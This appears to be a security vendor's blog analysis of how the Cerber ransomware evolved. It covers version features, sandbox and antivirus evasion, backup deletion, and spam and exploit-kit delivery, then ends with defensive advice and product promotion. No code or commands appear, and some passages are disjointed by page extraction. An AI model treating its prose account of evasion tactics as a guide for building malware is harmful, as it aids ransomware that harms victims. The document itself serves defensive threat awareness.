Figure 1: Top countries affected by Cerber, with U.S. the most heavily impactedWe’ve also seen how the latest versions of Cerber employed a number of methods to avoid traditional security solutions. Since its emergence in 2016, Cerber's evolution has shown how its developers constantly diversified the ransomware’s attack chain while broadening its capabilities to stay ahead of the game. Here is a summary of Cerber’s evolution so far:
|Cerber v1, v2 and v3||Cerber v4||Cerber v5||Cerber SFX||Cerber v6|
|File Type||EXE||EXE||EXE||SFX (Loader) VBS, DLL||EXE|
|Exceptions (Cerber doesn't execute if it detects certain components in the system)||Language in v1 and v3* Language and antivirus (AV) for v2*||Language*||Language*||AV, VM, Sandbox (Loader*), and Language*||Language*|
|Anti-AV Routine||None||None||None||None||EXE files of AV, Firewall and Antispyware products set to be blocked by Windows firewall rules*|
|Anti-sandbox||None||None||None||VM and Sandbox (Loader*)||VM and Sandbox (Loader*)|
|Backup Deletion||Yes (vsadmin, WMIC, BCDEdit)*||Yes (WMIC)*||Yes (WMIC)* Removed in v5.02||Varies (some samples have backup deletion capabilities)||Varies (some samples have backup deletion capabilities)|
|Exclusion List (directories and file types Cerber doesn't encrypt)||Folder and file*||Folder and file*||Folder and file*; and AV, Antispyware, and Firewall directories||Folder and file*; and AV, Antispyware, and Firewall directories||Folder and file*|
Figure 3: Infection chain of Cerber Version 6Adding a time delay in the attack chain enables Cerber to elude traditional sandboxes, particularly those with time-out mechanisms or that wait for the final execution of the malware. Other JS files we saw ran powershell.exe (called by wscript.exe) whose parameter is a PowerShell script—the one responsible for downloading the ransomware and executing it in the system. Cerber was distributed as a Windows Script File containing an obfuscated, Cerber-toting JScript code. Along with seemingly legitimate email content, it was one of the early techniques Cerber used to evade spam filters and heuristic analysis. Barely a week after, Cerber was updated with the capability to integrate the infected system into botnets, which were employed to conduct distributed denial of service (DDoS) attacks. By July, a spam campaign was seen abusing cloud-based productivity platform Office 365 through Office documents embedded with malicious macro that downloads and helps execute the ransomware. Exploit kits are also a key element in Cerber’s distribution. Cerber-related malvertising campaigns were observed in 2016 diverting users to Magnitude, Rig, and Neutrino—which has since gone private—exploit kits that target system or software vulnerabilities. This year, we’re seeing relatively new player Sundown exploit kit joining the fray. More Cautious, Defensive Cerber 6 has features that stand out. For one, it no longer has a routine for terminating processes, which we saw in earlier versions like Cerber 4, which terminates database software-related processes to ensure encryption of files. This routine can be construed as superfluous, since Cerber, along with a strong encryption capability, already hits a broad target base and file types to start with. Cerber 6 also added another check on file extensions it’s not supposed to encrypt. This harks back to how we saw Cerber exhibiting behaviors that foreshadowed its shift to stealth-focused techniques. In February this year, certain variants (RANSOM_CERBER.F117AK) started checking if the affected system had any firewall, antivirus, and antispyware products installed, ensuring that their associated files aren’t encrypted. Cerber 6 goes beyond identifying them and can now be configured to have Windows firewall rules added in order to block the outbound traffic of all the executable binaries of firewalls, antivirus, and antispyware products installed in the system. This can possibly restrict their detection and mitigation capabilities. This is further exacerbated by how Cerber can also circumvent static machine learning detection on top of self-awareness of analysis tools and virtualized environments that allows it to evade them (by self-destructing).
Figure 5: Cerber 6 uses Windows Management Interface to check for security products installed in the systemLocky constantly changed email file attachments in its spam campaigns by expanding arrival vectors beyond JS files and PowerShell scripts—from JScript to HTML Application (.HTA) and compressed binary files (.BIN)—and exploiting file types that aren’t usually used to deliver malware. In fact, we’re currently seeing .HTA files being leveraged by a campaign that uses Cerber as payload. Our initial analysis indicates that the campaign, which we began monitoring by the third week of April, appears to be targeting Europe. We also found the same campaign attacking two Latin American countries. This campaign is notable for displaying Cerber’s ransom note in the local language of the infected system. It uses an .HTA file to show the online message/ransom note as well as detect the local language to be displayed. incorporating the ransomware as a secondary payload. Exploits for a recently patched remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638) reportedly emerged to infect Windows servers with Cerber. Indeed, Cerber’s evolution reflects the need for organizations and end users to be aware of today’s constantly evolving threats. End users risk losing money and their important personal files to ransomware; it also threatens organizations' business operations, reputation, and bottom line. While there is no silver bullet against ransomware, keeping systems up-to-date, taking caution against unsolicited and suspicious emails, regularly backing up important files, and cultivating a culture of cybersecurity in the workplace are just some of the best practices for defending against ransomware. IT/system administrators and information security professionals can further defend their organization’s perimeter by incorporating additional layers of security against suspicious files, processes, applications, and network activity that can be exploited and leveraged by ransomware. Users and businesses can also benefit from a multilayered approach to security that covers the gateway, endpoints, networks, and servers. Trend Micro Ransomware Solutions: Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files, and spammed messages as well as blocking all related malicious URLs. Trend Micro™ Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachment and URLs. Trend Micro OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against ransomware and advanced malware. Our machine learning capabilities are tuned to account for attacks using techniques employed by ransomware like Cerber.
Endpoint ProtectionTrend Micro Smart Protection Suites detects and stops suspicious behavior and exploits associated with ransomware at the endpoint level.Ransomware Behavior MonitoringApplication ControlVulnerability ShieldingWeb Security
Network ProtectionTrend Micro Deep Discovery Inspector detects malicious traffic, communications, and other activities associated with attempts to inject ransomware into the network.Network Traffic ScanningMalware SandboxLateral Movement Prevention
Server ProtectionTrend Micro Deep SecurityTM detects and stops suspicious network activity and shields servers and applications from exploits.Webserver ProtectionVulnerability ShieldingLateral Movement Prevention
PROTECTION FOR SMALL-MEDIUM BUSINESSES AND HOME USERS
Protection for Small-Medium BusinessesTrend Micro Worry-FreeTM Business Security Advanced offers cloud-based email gateway security through Hosted Email Security that can detect and block ransomware.Ransomware behavior monitoringIP/Web Reputation
Protection for Home UsersTrend Micro Security 10 provides robust protection against ransomware by blocking malicious websites, emails, and files associated with this threat.IP/Web ReputationRansomware Protection